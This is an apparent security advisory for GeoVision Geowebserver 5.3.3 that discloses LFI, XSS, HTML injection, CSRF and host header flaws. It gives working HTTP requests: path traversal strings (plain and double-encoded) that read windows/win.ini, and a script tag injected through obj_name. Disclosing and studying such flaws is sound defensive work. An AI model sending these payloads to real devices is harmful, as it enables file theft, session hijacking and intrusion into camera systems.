GeoVision Geowebserver 5.3.3 LFI / XSS / CSRF / Code Execution

Credit: Ken Pyle
Risk: High
Local: No
Remote: Yes

# Exploit Title: GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE # DynamicDNS Network to find: DIPMAP.COM / GVDIP.COM # Date: 6-16-21 (Vendor Notified) # Exploit Author: Ken 's1ngular1ty' Pyle # Vendor Homepage: # Version: <= 5.3.3 # Tested on: Windows 20XX / MULTIPLE # CVE : GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. This allows injection of HTML code and XSS / client side exploitation, including session theft: Nested Exploitation of the LFI, XSS, HTML / Browser Injection: GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=<script>test</script><iframe%20src=""> HTTP/1.1 Absolute exploitation of the LFI: POST /Visitor/bin/WebStrings.srf?obj_name=win.ini GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini Additionally, the vendor has issued an ineffective / broken patch ( which does not appear to remediate or address the problem. Versions 5.3.3 and below continue to be affected. This is acknowledged by the vendor. ex. obj_name=INJECTEDHTML / XSS The application fails to properly enforce permissions and sanitize user request. This allows for LFI / Remote Code Execution through several vectors: ex. /Visitor//%252e(path to target) These vectors can be blended / nested to exfiltrate data in a nearly undetectable manner, through the API: The devices are vulnerable to HOST HEADER POISONING and CROSS-SITE REQUEST FORGERY against the web application. These can be used for various vectors of attack. These attacks were disclosed as part of the IOTVillage Presentation:

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022,


Back to Top